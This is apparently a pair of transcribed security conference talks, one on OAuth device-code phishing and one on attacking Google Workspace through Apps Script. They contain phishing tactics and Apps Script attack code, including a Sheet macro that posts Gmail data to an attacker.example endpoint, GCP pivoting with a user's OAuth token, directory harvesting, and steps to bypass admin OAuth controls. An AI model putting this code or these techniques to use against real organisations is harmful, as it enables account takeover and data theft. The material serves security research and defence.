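const DEVICE_LOGIN_URLS = [
  "https://microsoft.com/devicelogin",
  "https://login.microsoftonline.com/common/oauth2/deviceauth",
  "https://www.google.com/device",
];

function isDeviceLoginRequest(requestUrl) {
  return DEVICE_LOGIN_URLS.some((blocked) => requestUrl.startsWith(blocked));
}

// A proxy hook might block or alert on matches, while allow-listing
// known-good uses such as the Azure CLI's device flow.
console.log(isDeviceLoginRequest("https://microsoft.com/devicelogin")); // true
```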
Detection is difficult, because logging of anything related to OAuth tokens or temporary session tokens is very limited. Remediation does exist: once you do know there's a problem with a user, you can revoke all OAuth tokens in Microsoft's world. In Google that is more obscure — you can do it, but it's not as obvious as a straight API call. There are some practical considerations to keep in mind. The main one is that the user code, once generated, is temporary: it will typically expire after 15 or 30 minutes (the expiry is in the response of the REST API call). It just means the attacker can, in response, play a phishing numbers game — ignore the expiration and just blast the phish off to a large number of users at a certain time in order to get some of them to respond. Going over email has its advantages in that the phish can be rich — it can sell a story — but the timing may result in a low response rate to the phish. Practically speaking, though, you could choose other forms of communication, including chat or SMS, that might create a more instant response because of how those applications are used in everyday interactions. So there are ways around this temporary time frame. You could also fall back and actually create some infrastructure — host your own website — and have your phish, instead of supplying a code, point the user to that fake hosted website to "get your discount code", with the site generating a fresh device code on demand. Discount codes exist in that model today, and it's probably reasonable that someone will fall for it. You could even dynamically generate images that show codes — images are suggested because, unlike JavaScript, they are allowed in actual mail clients. They might be blocked by default, but the user always has the option to load images, and that could, at that point in time, dynamically generate a code and give a fresh 15 minutes for the user to act. I point that out mainly because the expiry is the one area that, from a practical implementation viewpoint, needs to be accommodated. There are also some comparisons to make between OAuth providers — in this case I took the two major ones, Microsoft and Google. The main difference is that there's more exposure on the Microsoft side, because the handling of scopes is implicit and default and you can get quite a lot of permissions without even asking for them, whereas Google has really tightened up the scopes you get from device code authorization: access tokens can access the user profile, have limited Google Drive access — mainly to files the app itself has created — and some YouTube profile info. Because of that, the lateral movement story is very different: on the Microsoft side it was easy, as we saw in the demo, to switch among a large number of services, while on Google it's pretty limited and strict — you get what you get with the initial scope.
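Circling back to the remediation point above, a minimal sketch of what revoking a compromised user's tokens might look like on the Microsoft side is shown below, using the Microsoft Graph revokeSignInSessions action (which invalidates refresh tokens so they can no longer be redeemed). This is illustrative: an admin-privileged token is assumed, and you should confirm the exact call and required permissions against current Microsoft documentation.

```javascript
// Sketch: remediation — force-revoke a user's refresh tokens via Microsoft Graph.
// adminAccessToken is assumed to carry sufficient admin privileges.
async function revokeUserSessions(adminAccessToken, userPrincipalName) {
  const resp = await fetch(
    `https://graph.microsoft.com/v1.0/users/${encodeURIComponent(userPrincipalName)}/revokeSignInSessions`,
    { method: "POST", headers: { Authorization: `Bearer ${adminAccessToken}` } }
  );
  return resp.status; // existing refresh tokens become unusable; access tokens still expire on their own
}
```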
All in all, this drives towards mentioning some ongoing research areas. The problem with OAuth is not that it's got flaws or is insecure; the problem is more that it's complicated. We talked about the normal OAuth flow — the payments and CLI login examples — and we did a demo of how one other flow, device code authorization, can be easily exploited. There are three more flows which aren't quite as obvious as device code authorization in terms of exposure, but are certainly interesting areas to research, because some of them have usability-type requirements — like implicit grants, where things like consent can be bypassed because there's a way to get access tokens silently in the background. The default scopes in Microsoft's implementation are another area to delve further into, just to see how those scopes are specified and returned, because there may be things to explore there. On consent — let me preface this by saying there is a model for incremental consent, so that an application can ask the user for certain permissions one at a time, as needed. But then it gets into dynamic user consent, and some of the language just hints that the behavior is not quite as straightforward as you might think — and complexity breeds opportunities for exploits. The last area is particularly interesting in that browsers today offer usability features where you log into one application — say you're in Chrome and you log into Gmail — then you open up a tab in that same browser and go to Google Drive: you don't have to re-authenticate to Drive even though that's a separate app, and you're not even presented with a consent screen for either application. So browsers today, for usability, already provide this kind of auto-login and scope expansion — in the sense of switching scopes — that doesn't involve users explicitly entering credentials every time and re-approving scopes and permissions. What does that mean? It just means usability might have shortcut some parts of the protocol, because it is OAuth underneath. And it's not all hypothetical: back in 2013 there was an opportunity, with certain Chromium-based browsers, where you could trade in a token and get more of a super or uber token that could access a lot of information across apps without ever having gone through any re-authentication. Anyway, long story short, it's a very interesting area, and beyond this list the more important takeaway is that we have a complicated authorization protocol; we have differences in implementation, as we've seen — Microsoft has a few quirks, Google has some different ones — resulting in different behavior; it's ubiquitous — as much a standard as anything on the internet, you can't avoid it, everyone's using it — and it's distributed by nature over a large network with REST APIs. So this is a particularly interesting area for us to keep an eye on in terms of security risks and opportunities. So thank you — that is the end of the talk. We didn't cover them in detail, but there are open source tools that you can use to run the demo, do self-phishing, and explore what permissions are available once you do get responses to phishes. Finally, there is a list of references, which is in the initial presentation but repeated here as well. Thank you for your time, and if there's time for questions we'll take them now.
|
OAuth 2.0 device authorization gives users on limited-input devices like TVs an easier way to authenticate against a cloud website/app by entering a code on a computer/phone. This authentication flow leads to new phishing attacks that: - do not need server infrastructure--the login page is served by the authorization provider using their domain and cert - do not require a client application--application identities can be reused/spoofed - do not require user consent of application permissions Since the phish attacks hijack OAuth session tokens, MFA will be ineffective as the attacker does not need to reauthenticate. The ability to defend against these attacks is hindered by limited info and functionality to detect, mitigate, and prevent session token compromise. I'll demonstrate these new phishing attacks, access to sensitive user data, and lateral movement. Defensive measures against these phishing attacks will be discussed, specifically the challenges in detection, mitigation, and prevention, and the overall lack of support for managing temporary credentials. Open-source tools have been developed and will be used to demonstrate how users can: - self-phish their organizations using these techniques - audit security settings that help prevent/mitigate the attacks REFERENCES: 1.0 Evolving Phishing Attacks 1.1 A Big Catch: Cloud Phishing from Google App Engine and Azure App Service: https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service 1.2 Microsoft Seizes Malicious Domains Used in Mass Office 365 Attacks: https://threatpost.com/microsoft-seizes-domains-office-365-phishing-scam/157261/ 1.3 Phishing Attack Hijacks Office 365 Accounts Using OAuth Apps: https://www.bleepingcomputer.com/news/security/phishing-attack-hijacks-office-365-accounts-using-oauth-apps/ 1.4 Office 365 Phishing Attack Leverages Real-Time Active Directory Validation: https://threatpost.com/office-365-phishing-attack-leverages-real-time-active-directory-validation/159188/ 1.5 Demonstration - Illicit Consent Grant Attack in Azure AD: https://www.nixu.com/blog/demonstration-illicit-consent-grant-attack-azure-ad-office-365 https://securecloud.blog/2018/10/02/demonstration-illicit-consent-grant-attack-in-azure-ad-office-365/ 1.6 Detection and Mitigation of Illicit Consent Grant Attacks in Azure AD: https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/ 1.7 HelSec Azure AD write-up: Phishing on Steroids with Azure AD Consent Extractor: https://securecloud.blog/2019/12/17/helsec-azure-ad-write-up-phishing-on-steroids-with-azure-ad-consent-extractor/ 1.8 Pawn Storm Abuses OAuth In Social Engineering Attack: https://www.trendmicro.com/en_us/research/17/d/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks.html 2.0 OAuth Device Code Flow 2.1 OAuth 2.0 RFC: https://tools.ietf.org/html/rfc6749#page-24 2.2 OAuth 2.0 for TV and Limited-Input Device Applications: https://developers.google.com/identity/protocols/oauth2/limited-input-device 2.3 OAuth 2.0 Scopes for Google APIs: https://developers.google.com/identity/protocols/oauth2/scopes 2.4 Introducing a new phishing technique for compromising Office 365 accounts: https://o365blog.com/post/phishing/#oauth-consent 2.5
Office Device Code Phishing: https://gist.github.com/Mr-Un1k0d3r/afef5a80cb72dfeaa78d14465fb0d333 3.0 Additional OAuth Research Areas 3.1 Poor OAuth implementation leaves millions at risk of stolen data: https://searchsecurity.techtarget.com/news/450402565/Poor-OAuth-implementation-leaves-millions-at-risk-of-stolen-data 3.2 How did a full access OAuth token get issued to the Pokémon GO app?: https://searchsecurity.techtarget.com/answer/How-did-a-full-access-OAuth-token-get-issued-to-the-Pokemon-GO-app ===
|
10.5446/54221 (DOI)
|
Thank you all for coming. This is Hacking G Suite: the power of dark Apps Script magic. A little bit of background on myself: I'm Matthew Bryant, and I often go by my handle, mandatory. I currently lead the Red Team effort at Snapchat. Outside of work, I also post occasionally about security on Twitter at @IAmMandatory, and I do hacking blog posts at my website, thehackerblog.com. So let's start off with some context and background to give a basis for what we'll be talking about today. Google Workspace, for those of you who aren't familiar, is essentially the new name that Google has given to G Suite — I know it can be tough to keep up with all of Google's ever-changing brand guidelines. I will still be referring to this as G Suite throughout the talk, just because I think most people are more familiar with G Suite than Google Workspace. What G Suite is, essentially, is the suite of Google services that people use: things like Gmail, Drive, Calendar, all that stuff. This is available both for regular, personal users as well as companies and enterprises. It allows people, in a company for example, to collaborate online to get work done using all of the various Google services, and as of the time of this research they were boasting over two billion users. So a ton of people use this stuff. For those of you who aren't familiar with Apps Script: Apps Script is essentially a JavaScript-based language used to write serverless JavaScript apps that run on Google infrastructure. It's a custom way to build apps that's highly optimized for automating Google services. It comes with a lot of really useful libraries for automating everything from Google Docs to Gmail to any Google service you can think of. On top of having all these pre-built libraries, it has seamless integration with Google's app registration system and its OAuth system. So normally, when you set up a new OAuth app with Google, you have to set up the callback URI, configure your app to work with it, and all sorts of those things — but when you use Apps Script, that's all magically done for you. All this authorization stuff is just handled automatically. It also offers a variety of triggers that you can use to start your scripts: everything from somebody hitting a web endpoint that kicks off a script, to somebody opening a Google Doc and the script running on open, to scheduled cron-style execution jobs, and things of that nature. This is an example screenshot of the Apps Script editor — you can see it's actually a pretty full IDE environment. It has everything from code completion to breakpoints and debugging, all the stuff that you'd expect from your regular dev environment.
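To make those trigger types concrete, here's a minimal Apps Script sketch — my own illustration, not code from the talk — showing the three trigger styles mentioned: a web endpoint, a document-open trigger, and a scheduled job. The function names are arbitrary.

```javascript
// Minimal Apps Script sketches of the trigger types mentioned above.

// 1. Web endpoint: deploying this as a web app makes doGet() run whenever the URL is hit.
function doGet(e) {
  return ContentService.createTextOutput("hello from Apps Script");
}

// 2. Simple trigger: runs when a user opens the bound Doc/Sheet/Slide.
function onOpen(e) {
  Logger.log("document opened");
}

// 3. Time-driven (cron-style) trigger, installed programmatically.
function installHourlyJob() {
  ScriptApp.newTrigger("hourlyJob").timeBased().everyHours(1).create();
}
function hourlyJob() {
  Logger.log("scheduled run at " + new Date());
}
```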
Google's OAuth system is very similar to a lot of the other OAuth systems out there. Essentially, it's a system built to allow third-party apps, built by arbitrary individuals, to request access to resources that Google users have in their accounts. For example, maybe I have some Google Docs in my account and I want to automate something for those Docs using a third-party app — this allows me to delegate access to my Google Docs to that third-party app so it can do that for me. The permissions to these resources are known as scopes, and there are over 250 of them, covering all of the various Google services you can think of — BigQuery, Gmail, Google Docs, stuff like that. The way it works is that your app redirects the user to an authorization prompt that gives them a brief summary of what you're requesting permission-wise, and the user can think it over and decide, yep, I'm going to allow that, or no, I'm going to reject that. If they allow it, your app gets sent some tokens which you can then use to talk to these APIs, authenticated as the user. As I mentioned, that prompt looks like this: a sort of human-readable little summary. In this case, this example app says, hey, this is going to request access, and if you allow it, it will have access to your Gmail, it will have access to Google Cloud and everything in it, and it's also asking for permission to run when you're not present — so it's not just a one-time thing; in the future it could keep running indefinitely. Tying all these concepts together and thinking at a higher level, this becomes a pretty attractive option when it comes to targeting organizations or companies that are on the G Suite stack. Apps Script is attractive for things like targeted spear phishing, and — say you've already compromised an individual employee account in a G Suite org — it's a very attractive option for backdooring that account as well. The reason it's attractive is that an Apps Script implant sits outside the eyes of all the regular monitoring controls that run on people's end machines and laptops. Regular antivirus, endpoint detection tooling, on-device monitoring — none of that is really effective here because, again, it runs completely on Google's infrastructure. It's a totally serverless environment, so they have no visibility into it at all. Even better, if your victim wipes their laptop for some reason, your implant is completely unaffected and totally retains full access to their account. Another interesting thing: if you think about companies that have extremely hardened environments, Apps Script is an interesting option even then. When I say hardened environments, I mean companies with things like mandatory hardware universal two-factor on logins — places where traditional credential phishing just isn't going to work because they have a hardware key that they actually have to tap to log in; things like hardened Chromebooks with locked-down enterprise policy, so you can't get a binary implant running on there, you potentially can't even install Chrome extensions if the enterprise policy is locked down, and they have hardware attestation and all that other good stuff. Super locked-down environments. Getting around these measures means thinking a little more cleverly than your average attacker. This isn't the casual Windows-networking-style pentest that's more common — this is a completely unique environment, so we'll have to be a little more unique in how we think about it and how we approach these things. So I'm going to go into some historical precedent here.
One thing that I think is a particularly interesting example is an attack that happened a few years ago which was essentially built around abusing Google's OAuth and API system. Some of you may recognize this screenshot — maybe you were one of the individuals affected by it. It was later dubbed the Google Docs worm. The way it worked is that the worm would send these phishing emails, like this one — from somebody you personally knew, coming from their actual email address — saying, hey, your friend has invited you to view a document, with a button to open that document. But when you actually went and did that, it would present you with this OAuth prompt that says, hey, "Google Docs" wants access to read, send, delete, and manage your email, and also access all your contacts. Now, of course, security people watching this are thinking, I would never approve that prompt. But the average user looks at it and thinks: okay, Google Docs wants access to my Gmail and contacts — yeah, I thought it would already have that, sure, why not? And they would probably go ahead and approve it. So it's a very, very convincing attack for a lot of regular computer users. Of course, if they did authorize this app to access their Google account, what it would immediately do is use the contacts access to grab their 1,000 most recent contacts — their friends and coworkers — and send out this exact same phishing email, as them, to all of those contacts. That would repeat the cycle: those people would then get the same phishing email we saw before. The impact of this attack was actually pretty impressive — it spread like wildfire and ended up affecting over a million Google users, everything from personal Google users like you and me to the big enterprise business users, the G Suite organizations. Google responded rapidly — they actually had a really good response time. They did everything from killing the emails that were spreading around to killing off all the apps, and they did all of this in a couple of hours. After doing some post-mortem analysis on the JavaScript that was used to control and run this attack, it turns out the coding was actually pretty amateur — it wasn't the advanced, crazy nation-state thing that most people assumed — and it essentially looked like it was only collecting email addresses. So all things considered, this attack could have been much, much worse; in some ways it almost seemed as if it was unfinished. So let's break down this attack into its core components. One fairly advanced trait is that they did think ahead and had multiple rotating apps — they registered multiple OAuth apps ahead of time and ended up using them along with different domains to prevent the easy case of Google just blocking their app or blocking a given domain.
Google instead had to track down all of the apps and all the domains and block all of them to prevent this from spreading. The worm also made use of some Unicode characters — you saw earlier that the app name was actually "Google Docs". That was possible because they were evading filters which normally prevent you from putting something like "Google" in the name of an app, by using Unicode characters which look exactly the same as their ASCII equivalents — so it was "Google" spelled with, say, a Swedish o, for example. And of course it used the social engineering and phishing scheme that we saw, which was quite convincing to people, and it self-propagated in the old-school email spam style: it infects somebody, sends to all of their contacts, some of those friends fall for it, and then it sends to all of their contacts as well. Except, unlike the email worms of old, this used the more modern OAuth-style authentication and authorization to carry out the attacks, as opposed to old-school credential harvesting and the like. As you can imagine, this was pretty shocking to a lot of companies and users, so Google made some pretty quick changes and mitigations after it happened. Around two months later, they introduced a G Suite admin control for administrators of companies to lock down their orgs. The way it works is they can basically set a policy that says: none of my employees are allowed to grant access to any of their Google account data for their employee account, unless it's to one of these explicit OAuth apps that I've explicitly allowed. This lets you lock things down so that if, say, this worm happened again, your employees straight up would not be able to grant these permissions to their accounts, because it would be blocked unless the app was whitelisted into the enterprise policy. Google later introduced what are called sensitive and restricted scopes — they labeled a bunch of these permissions, as I mentioned before, as either sensitive or restricted depending on the kind of data access they would grant. In addition, they introduced what's called the unverified app warning prompt for smaller apps that require these scopes. And they cracked down on a lot of other misleading OAuth apps — they beefed up their security around what you can name an OAuth app, to prevent the same exact attack we saw before, so you can't mimic Google-style names and things like that. So just some quick food for thought here: this attack really didn't utilize a whole lot of crazy zero-day bugs or exploits, apart from, I guess, some of the Unicode trickery for the name. It was basically using the system as designed, but the impact was incredibly substantial. That's something to really think about: you don't necessarily have to have one big bug or one exploit to pull off these crazy attacks — you can simply abuse the system as it was designed, and the design itself can lend itself to attacks like this.
So just something to think about in general with this talk. We've covered the history; now let's go into the latest: all the mitigation is in place, so what can we bypass and what can we do in this modern age? I talked earlier about the unverified app prompt. This is for apps, of course, that ask for sensitive scopes, and there are quite a few of them. Essentially this is not a light warning — it's a really serious prompt that actually dissuades users from continuing. It looks like it takes some tips from Google Chrome's UI for invalid-SSL sites that you visit. The way the user can continue is that they have to click this little "show advanced" text, go down to the bottom, and click through. For the regular user, this is just not going to be a tenable thing — they're just not going to get through it. So it poses a significant barrier for us as attackers if we want to phish a user via OAuth here. So what is a sensitive or restricted scope? That just means any API with the potential to access private data — everything from Gmail to BigQuery, Google Cloud, Drive, Calendar. It's actually a large percentage of the scopes — over 120 APIs. The way it works is: if it's a small app, with fewer than 100 users, you get this unverified app prompt; and if the app is bigger than 100 users, you need to go through an even stricter process where you undergo a fairly intense manual review. And this process is no joke — there are companies that have to use these scopes legitimately for real-world services they provide, and they have written entire posts about how hard it was for them to get past this review process. So it's the real deal, and it's definitely not something we could realistically pass if we were an attacker trying to publish a malicious app — that's just not a tenable route for us. But there are some exceptions to this policy. If you take a look at the documentation, essentially, if you have some Apps Script or an app that uses a sensitive scope and you fall into any of these categories, then either the normal OAuth flow without the unverified app prompt will happen, or the unverified flow will happen. One of these in particular is interesting — the intersection of these two. Essentially what it says is: hey, if the publisher of this app is in the same G Suite org as the user who's authorizing and running it, then there will be no unverified app prompt. And this sort of makes sense, right? You can imagine you've got a coworker; they've created this app and then shared it with you, and you want to run it. You trust them, it's an internal action, so it wouldn't really make sense to have this scary prompt — it's internal use and somewhat implicitly trustworthy. So that's something interesting: if we could abuse that, we could essentially get around this.
One other thing to note about Apps Script: an Apps Script can be either a standalone project — a standalone script that runs on its own — or it can be what's called bound to a container. By container, this means you can bind it to a Google Doc, a Sheet, or a Slide. When you do this, your script can manipulate the document, customize the UI, and so on. The way it works is that the regular triggers I talked about before apply to any user who has edit access to the doc — so they have to have access to the doc, and then they can kick off any of these Apps Script triggers and run the app, keeping in mind, of course, that they still have to accept the OAuth prompts if it's requesting any scopes. So this is our average OAuth phishing scenario: say we have a Google Doc with some Apps Script attached to it, and we send our victim — who's inside this G Suite org — the link. When they open the doc, trigger it, and the prompt spawns, they of course get the "hey, Google hasn't verified this app, it's requesting sensitive scopes" warning, and likely the victim will think, nah, this isn't for me, I don't even know how to get through this. So our attempt is probably going to fail there. Now, one interesting thing about Google Docs, Sheets, Slides, and all this stuff is that if you change the usual URL you get — from ending in /edit to ending in /copy — then instead of directly opening the document interface, you'll actually get this prompt instead. This prompt essentially says, hey, do you want to make a copy of — in this case — this "confidential" company-details document, and they get a little button that says make a copy. When they click it, the document or sheet is copied into their own Google Drive, and then they're immediately taken to the full UI for working with it. So going back to the attack I mentioned earlier: now, as the attacker, we send our victim this copy link instead of the regular link. When they click through to make a copy, it copies into their Google Drive, and then when they trigger the Apps Script attached to it, they get the regular prompt without the unverified app screen. The reason they get this is that, if you look at the app itself, you'll notice the actual developer behind the app is the victim — and the reason it's the victim is that when they copied that doc, they became the creator; they copied the doc, and now they're the creator and owner of the script. So they'll actually see that they themselves are requesting the permission from themselves. There's one problem, though: when you copy a document with Apps Script attached to it, the triggers don't come along for the ride. So they don't really have a way to trigger this thing to get the prompt to display, and that's kind of a pain.
One way we can get around this problem is that Google Sheets have what are called macros. This is something made to compete with Microsoft Excel's VBScript-style automation for manipulating and automating spreadsheets. What's useful about the Google Sheets version is that macros can call arbitrary Apps Script. What's even more useful is that if you have an image in your Google Sheet, you can assign a macro to it — so when somebody clicks on the image, it automatically runs that macro, which by proxy runs any arbitrary Apps Script that you want. So this is a great way to trigger your Apps Script payload. I've got a little demo here where you can see the victim: they go in and click to make a copy of this Google Sheet, and after they've clicked that button they're taken directly to their copied sheet, where they see this beautiful image of a goose with a butter knife, looking totally not threatening at all. When they go to click on that, they get the authorization prompt, and when they click continue, you can see they get the regular OAuth prompt — no warnings at all. So we've essentially bypassed that whole restriction around unverified apps. But that's not all we've bypassed. In addition to bypassing the unverified app screen, there's also — as I mentioned a little earlier in the talk — that G Suite admin setting that allows you to lock down your organization to prevent third-party OAuth apps from requesting permissions on your employees' accounts. This gets around that as well. That entire system is essentially bypassed, and the reason is exactly the same as the reason for bypassing the unverified app prompt: when the copy is made into the Google Drive of the victim, who is inside the org, the victim becomes the new owner, so the OAuth app itself is an internal app, not a third-party app — it's first-party, inside the org. So the block on all third-party API access doesn't apply; this is bypassed as well. Another fun tip for defeating both the third-party app restrictions and the unverified app prompt: if you go through the docs, you realize that the doc and the Apps Script attached to it have the same owner. What's interesting about this is, say somebody has created a new Google Sheet or Doc inside their G Suite domain — that's actually kind of a bypass waiting to happen, because if they share edit access with anybody outside of the organization, that person can go in and create some Apps Script for that document, and the owner is still the person who created the doc or sheet in the first place. Since that ownership sticks, you can essentially use that document to start off your phishing or whatever attempt, because it will bypass all of the third-party app restrictions and the unverified app prompt we talked about previously — the app will be owned by the employee that first created the document. So if you can find one of these, it's a great starting place where you can skip the whole copy-style attack.
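Looping back to the macro trigger technique from the demo above: assuming you assign a function name to the image or drawing in the Sheet via its "Assign script" option, the payload might look roughly like this. The function name, requested scopes, and exfiltration endpoint are all placeholders of my own — this is a sketch of the idea, not the talk's actual payload.

```javascript
// Sketch: an Apps Script function assigned to an image in a Google Sheet.
// Clicking the image runs it; the first run pops the OAuth prompt for the
// scopes declared in the project's appsscript.json manifest (e.g. Gmail).
function innocentLookingButton() {
  // Anything here runs as the user who clicked, once they approve the prompt.
  const me = Session.getActiveUser().getEmail();
  const subjects = GmailApp.search("in:inbox", 0, 5).map((t) => t.getFirstMessageSubject());

  // Placeholder exfiltration endpoint -- illustration only.
  UrlFetchApp.fetch("https://attacker.example.com/collect", {
    method: "post",
    contentType: "application/json",
    payload: JSON.stringify({ victim: me, subjects: subjects }),
  });
}
```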
So we've talked about how to pierce the perimeter. Now let's go into what happens once you've got some access — say you've compromised one employee's G Suite account. Where do you go from there? What can you pivot to, and how can you escalate privileges? For most companies, probably the most interesting data they have is in Google Cloud, so pivoting to Google Cloud from your Apps Script implant seems pretty important. Accessing Google Cloud through Apps Script is not super documented, but you can do it by requesting the cloud-platform scope, which gives you access to all the GCP APIs — everything from BigQuery to Google Cloud Functions to GCE, all of it — as the user who authorized access to your app. The way you authenticate to these APIs is with the Apps Script function ScriptApp.getOAuthToken(): you take that value, put it in the Authorization: Bearer header, and use it to authenticate to all the APIs. But when you do this there's a gotcha: when you try to use this for the GCP APIs, you're going to get a warning that says the API you're trying to access has not been used in this project ID — some number you've never seen before — or it's disabled, so the request has failed. What's even stranger is that the project number displayed isn't even for the project you're trying to access. So what's the deal here? Again, not super well documented, but essentially, when you create a new Apps Script app, upon creation you're allocated a sort of hidden Google Cloud project that's attached to and associated with the Apps Script app. This implicitly binds the API requests you make — with the access token generated by your implant — to that project, which is why you see this arbitrary project number: it's for the hidden project. Unfortunately, you can't access the hidden project via the Google Cloud console or anything like that, and you can't enable services on it programmatically like you normally would be able to. So this is kind of a big problem. Well, it turns out you can get around it by specifying the X-Goog-User-Project header and setting it to the project you're actually trying to query — so if you're going after a particular project, for example, you add this header and set it to that value. That basically looks like this: set the project ID in the header on your API calls, put your Authorization: Bearer header to that ScriptApp.getOAuthToken() value I mentioned before, and you can talk to all the GCP APIs to your heart's content.
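Here's a minimal Apps Script sketch of that GCP pivot as I understand it from the description above. The cloud-platform scope is assumed to be declared in the project's appsscript.json manifest, and the target project ID is a placeholder — treat this as illustrative rather than the speaker's exact code.

```javascript
// Sketch: calling GCP APIs from an Apps Script implant as the authorizing user.
// Assumes appsscript.json contains:
//   "oauthScopes": ["https://www.googleapis.com/auth/cloud-platform"]
const TARGET_PROJECT = "victim-project-id"; // placeholder GCP project to query

function listBigQueryDatasets() {
  const token = ScriptApp.getOAuthToken(); // token for the user who approved the implant
  const resp = UrlFetchApp.fetch(
    "https://bigquery.googleapis.com/bigquery/v2/projects/" + TARGET_PROJECT + "/datasets",
    {
      headers: {
        Authorization: "Bearer " + token,
        // Without this header, requests are bound to the hidden Apps Script project and fail.
        "X-Goog-User-Project": TARGET_PROJECT,
      },
      muteHttpExceptions: true,
    }
  );
  Logger.log(resp.getContentText());
}
```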
By default in G Suite there are essentially three permission levels. The most restricted sharing setting for a file is that only people explicitly on the ACL are allowed to access the document — you have to go one by one adding users to give them access, and if somebody isn't on the list, they can't view it. The second level is that anybody who has the link to the document or file can access it. You're essentially sharing by link: with the link they can access it, without it they can't. The widest, most open setting makes the document searchable, so anybody inside the company who searches from the Drive web page can find your internal doc. So those are the defaults: by default a document has the strictest sharing setting, where you have to explicitly add people; one click away from that is share-by-link, where everybody with the link can access the document; and a few more clicks gets you to searchable-by-everybody. One detail worth noting: if a document is shared by link and somebody else views it once, it becomes searchable for them from then on — the assumption being that if you had the link and visited it once, you should be able to find it again. These unique document URLs are outside the range of brute forcing, so if somebody shares by link you're not going to be able to brute force the link itself; you have to actually have it. That's the strictly technical side, but real-world usage tends to be quite different, so what actually ends up happening? In my experience, if a file is important, then almost by definition it's going to be shared with other people — people are going to view it, make changes, leave suggestions. With the strictest setting, the owner of the doc has to add individual users one by one, and that's a very tedious process, especially when you're doing it for, say, 40 people. You can use Google Groups to put together ACL groups that can be added in bulk, but it's still tedious. So what often ends up happening is people share with so many individuals that eventually they just say forget it and switch to sharing by link, where anybody who has the link can view it. In practice that tends to be pretty common, and only a tiny portion of documents end up in that wide searchable mode, just because of the amount of user interaction required. So how do we get access to that big area of stuff that's shared by link?
Of course there's the basic method, which is just to search all the internally shared systems inside a company — check the chat, the internal forums, the Q&A sites, the ticket management queues, whatever bug trackers — and mine out all the Google Docs and Drive links. You can do that. But there's another way, which is actually the same way we index and make documents searchable on the web. You have a script that takes some seed Google Drive, Sheets, or Docs links; it goes through each one — say you give it a Google Sheet, it parses it and finds all the links inside that document — and then it recursively crawls all of those documents as well, looking for links inside them, and so forth, until it has enumerated all the other documents that are indirectly linked from the ones you started with. I've written an Apps Script spider that does exactly this: you plug in some seed links, it uses them as a starting point and recursively crawls until it has exhausted all the paths, and along the way it collects metadata about the sharing of each document, its context, the authors, and so on. You can let it run, gather up all these documents, and then look through the results to see if they contain the data you're after. You can download it from the GitHub link here, so feel free to take a look. Another useful thing to do is to request scopes for the People API. Every G Suite deployment ships with a really neat capability: an internal employee directory. With the People API, if you request the directory read-only scope, at a minimum you can enumerate all the other employees in the G Suite org and get everything from their names and emails to their titles. This becomes extremely useful and is something you probably want to collect early on. Say you've just compromised a G Suite employee — you want to immediately mine all this data out, because if an administrator catches you, figures out you ran a phishing campaign, revokes your app, and deletes all of your implant machinery, having this data is very, very useful for reentry. You can mount a much better-planned attack now that you have a good picture of their entire organization via this API, so I highly recommend it as an avenue. Now let's talk about escalating your privileges — how we can increase the privileges we have and get access to more things. One very good source of privilege escalation is legitimate internal Apps Script apps, developed by people inside the G Suite organization, that are attached to Google Docs, Sheets, Slides, and so on.
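As a rough sketch of the directory-mining step, something like the following could enumerate the internal employee directory from the implant. It assumes the manifest requests the directory read-only scope, and the field names in the read mask are my reading of the People API, so treat it as illustrative.

```javascript
// Sketch: enumerating the internal employee directory via the People API.
// Assumes the scope "https://www.googleapis.com/auth/directory.readonly".
function dumpEmployeeDirectory() {
  var base = 'https://people.googleapis.com/v1/people:listDirectoryPeople'
           + '?readMask=names,emailAddresses,organizations'
           + '&sources=DIRECTORY_SOURCE_TYPE_DOMAIN_PROFILE&pageSize=100';
  var pageToken = '';
  do {
    var url = base + (pageToken ? '&pageToken=' + pageToken : '');
    var resp = UrlFetchApp.fetch(url, {
      headers: { 'Authorization': 'Bearer ' + ScriptApp.getOAuthToken() },
      muteHttpExceptions: true
    });
    var data = JSON.parse(resp.getContentText());
    (data.people || []).forEach(function (p) {
      Logger.log(JSON.stringify(p.names) + ' ' + JSON.stringify(p.emailAddresses));
    });
    pageToken = data.nextPageToken;
  } while (pageToken);
}
```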
As I mentioned earlier, Apps Script can be bound to a doc, a sheet, or a slide, and the file a script is bound to is called its container. One of the things we have to ask is: say you have some Apps Script attached to a doc — do they have separate ACLs? Can you make it so someone can only edit the script and not the doc? How does that work exactly? If you read the Google documentation, a bound script shares its ACL exactly with its container. So if you have a Google Doc with Apps Script attached and somebody has edit permission on the doc, they by proxy have edit permission on the script as well. That leads to some interesting questions. Recall that edit access is required, as I mentioned earlier, to even run the Apps Script attached to a doc — users can't use the application unless they have edit access to the doc. But if they have edit access to the doc, sheet, or slide, then they also have the ability to edit the Apps Script attached to it. So how does this work when a bunch of people are all sharing the same doc, sheet, or slide and using the Apps Script attached to it? In a typical situation you have one app that, say, has access to these employees' Google Drive, BigQuery, things like that — it's automating some process for them. They all have to be granted editor access on the doc in order to use the Apps Script, they're all sharing it together, and they've all authorized this thing to access their services on their behalf. Now suppose one of those users is malicious. They have editor access to the doc, so they use that access to modify the Apps Script attached to it so that instead of the legitimate script it contains a malicious payload that does something nefarious — maybe it exfiltrates docs the other users have access to and the attacker doesn't. Then, when the regular users come along and trigger the Apps Script like they normally do, the malicious code runs as them. It's basically very, very hard to write an app like this securely, because by the way the system is designed you have to give people editor access, and once they have that they can edit the Apps Script, so any shared documents with scripts attached to them become very exploitable. And we can actually do one better than this. The technique so far implies you have to wait around for these people to trigger the Apps Script attached to the doc, and as attackers we're often quite impatient — we'd rather force it to happen right now. You can force a retrigger by going to the Apps Script and publishing a web endpoint. When you publish it you get a URL, and if that URL is visited by any of the users who have authorized the app, it will immediately trigger the script to execute as them.
